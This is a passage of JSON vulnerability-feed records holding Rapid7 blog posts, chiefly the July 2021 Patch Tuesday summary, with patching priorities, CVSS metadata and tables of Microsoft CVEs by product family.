[OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:56:11", "description": "![Patch Tuesday - July 2021](https://blog.rapid7.com/content/images/2021/07/patches-2.jpg)\n\n[Microsoft has patched another 117 CVEs](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>), returning to volumes seen in early 2021 and most of 2020. It would appear that the recent trend of approximately 50 vulnerability fixes per month was not indicative of a slowing pace. This month there were 13 vulnerabilities rated Critical with nearly the rest being rated Important. Thankfully, none of the updates published today require additional steps to remediate, so administrators should be able to rely on their normal patching process. Once[ CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) has been remediated, priority should be to patch public facing DNS and Exchange servers, followed by Workstations, SharePoint servers, and finally Office applications.\n\nIt seems like the PrintNightmare is nearly over. While the past two weeks have been a frenzy for the security community there has been no new information since the end of last week when Microsoft made a final revision to their guidance on[ CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). If you haven\u2019t patched this yet, this is your daily reminder. For further details [please see our blog](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) on the topic.\n\n## Multiple Critical DNS Vulnerabilities Patched\n\nAdministrators should focus their efforts on the 11 vulnerabilities in Windows DNS server to reduce the most risk. The two most important of these vulnerabilities are [CVE-2021-34494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34494>) and [CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>). Exploitation of either of these vulnerabilities would result in Remote Code Execution with SYSTEM privileges without any user interaction via the network. Given the network exposure of DNS servers these vulnerabilities could prove to be troublesome if an exploit were to be developed. Microsoft lists [CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>) as \u201cExploitation More Likely\u201d so it may only be a matter of time before attackers attempt to make use of these flaws.\n\n## New Exchange Updates Available\n\nOnly 4 of the 7 Exchange CVEs being disclosed this month are new. The two most severe vulnerabilities were patched in back in April and were mistakenly not disclosed. This means that if you applied the April 2021 updates you will not need to take any action for [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>), or [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33766>). Of the 4 newly patched vulnerabilities the most notable is [CVE-2021-31206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206>), a remote code execution flaw discovered in the recent Pwn2Own competition. \n\n## Scripting Engine Exploited in the Wild\n\nExploitation of [CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>) has been observed in the wild by researchers. There are no details on the frequency or spread of this exploit. This vulnerability requires the user to visit a link to download a malicious file. As with other vulnerabilities that require user interaction, strong security hygiene is the first line of defense.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Apps Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33753>) | Microsoft Bing Search Spoofing Vulnerability | No | No | 4.7 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34528>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34529>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34477>) | Visual Studio Code .NET Runtime Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33767>) | Open Enclave SDK Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n[CVE-2021-34479](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34479>) | Microsoft Visual Studio Spoofing Vulnerability | No | No | 7.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | Yes | 9.1 | No \n[CVE-2021-31206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31206>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-31196](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31196>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 7.2 | No \n[CVE-2021-34523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34523>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | Yes | 9 | No \n[CVE-2021-33768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33768>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2021-34470](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34470>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2021-33766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 7.3 | Yes \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34474>) | Dynamics Business Central Remote Code Execution Vulnerability | No | No | 8 | Yes \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34452>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34517>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 5.3 | No \n[CVE-2021-34520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34520>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.1 | No \n[CVE-2021-34467](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34467>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | No \n[CVE-2021-34468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34468>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | Yes \n[CVE-2021-34519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34519>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-34469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34469>) | Microsoft Office Security Feature Bypass Vulnerability | No | No | 8.2 | Yes \n[CVE-2021-34451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34451>) | Microsoft Office Online Server Spoofing Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-34501](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34501>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34518](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34518>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31984>) | Power BI Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34464>) | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34522>) | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33772](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33772>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-34490](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34490>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33744>) | Windows Secure Kernel Mode Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2021-33763](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33763>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34454>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-33761](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33761>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33773](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33773>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34445>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33743>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34493](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34493>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 6.7 | No \n[CVE-2021-33740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33740>) | Windows Media Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34458>) | Windows Kernel Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-34508](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34508>) | Windows Kernel Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-33771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33771>) | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-31961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31961>) | Windows InstallService Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2021-34450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34450>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 8.5 | Yes \n[CVE-2021-33758](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33758>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 7.7 | No \n[CVE-2021-33755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33755>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.3 | No \n[CVE-2021-34466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34466>) | Windows Hello Security Feature Bypass Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-34438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34438>) | Windows Font Driver Host Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34455>) | Windows File History Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33774>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-33759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33759>) | Windows Desktop Bridge Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34525](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34525>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34461>) | Windows Container Isolation FS Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34488>) | Windows Console Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33784>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34462>) | Windows AppX Deployment Extensions Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34459](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34459>) | Windows AppContainer Elevation Of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33785](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33785>) | Windows AF_UNIX Socket Provider Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33779](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33779>) | Windows ADFS Security Feature Bypass Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-34491](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34491>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34449>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34509](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34509>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34460](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34460>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34510](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34510>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34512](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34512>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34513>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33751>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-34521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34521>) | Raw Image Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34439>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34503](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34503>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-33760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33760>) | Media Foundation Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31947>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33775](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33775>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33776>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33777>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33778](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33778>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34489>) | DirectWrite Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-33781](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33781>) | Active Directory Security Feature Bypass Vulnerability | No | Yes | 8.1 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31183>) | Windows TCP/IP Driver Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33757>) | Windows Security Account Manager Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-33783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33783>) | Windows SMB Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34507](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34507>) | Windows Remote Assistance Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34457>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34456>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34527](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34527>) | Windows Print Spooler Remote Code Execution Vulnerability | Yes | Yes | 8.8 | Yes \n[CVE-2021-34497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34497>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34447](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34447>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-33786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33786>) | Windows LSA Security Feature Bypass Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-33788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33788>) | Windows LSA Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33764>) | Windows Key Distribution Center Information Disclosure Vulnerability | No | No | 5.9 | Yes \n[CVE-2021-34500](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34500>) | Windows Kernel Memory Information Disclosure Vulnerability | No | No | 6.3 | Yes \n[CVE-2021-31979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31979>) | Windows Kernel Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-34514](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34514>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33765>) | Windows Installer Spoofing Vulnerability | No | No | 6.2 | No \n[CVE-2021-34511](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34511>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34446>) | Windows HTML Platforms Security Feature Bypass Vulnerability | No | No | 8 | No \n[CVE-2021-34496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34496>) | Windows GDI Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34498>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-33749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33749>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33750>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33752>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33756>) | Windows DNS Snap-in Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-34494](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34494>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33780](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33780>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-33746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33746>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-33754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33754>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 8 | No \n[CVE-2021-34442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34442>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-34444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34444>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34499>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-33745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33745>) | Windows DNS Server Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-34492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34492>) | Windows Certificate Spoofing Vulnerability | No | Yes | 8.1 | No \n[CVE-2021-33782](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33782>) | Windows Authenticode Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-34504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34504>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34516](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34516>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34448>) | Scripting Engine Memory Corruption Vulnerability | Yes | No | 6.8 | Yes \n[CVE-2021-34441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34441>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34440>) | GDI+ Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34476>) | Bowser.sys Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Summary Graphs\n\n![Patch Tuesday - July 2021](https://blog.rapid7.com/content/images/2021/07/output_18_2.png)![Patch Tuesday - July 2021](https://blog.rapid7.com/content/images/2021/07/output_20_2.png)![Patch Tuesday - July 2021](https://blog.rapid7.com/content/images/2021/07/output_26_1.png)![Patch Tuesday - July 2021](https://blog.rapid7.com/content/images/2021/07/output_25_1.png)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T20:56:26", "type": "rapid7blog", "title": "Patch Tuesday - July 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 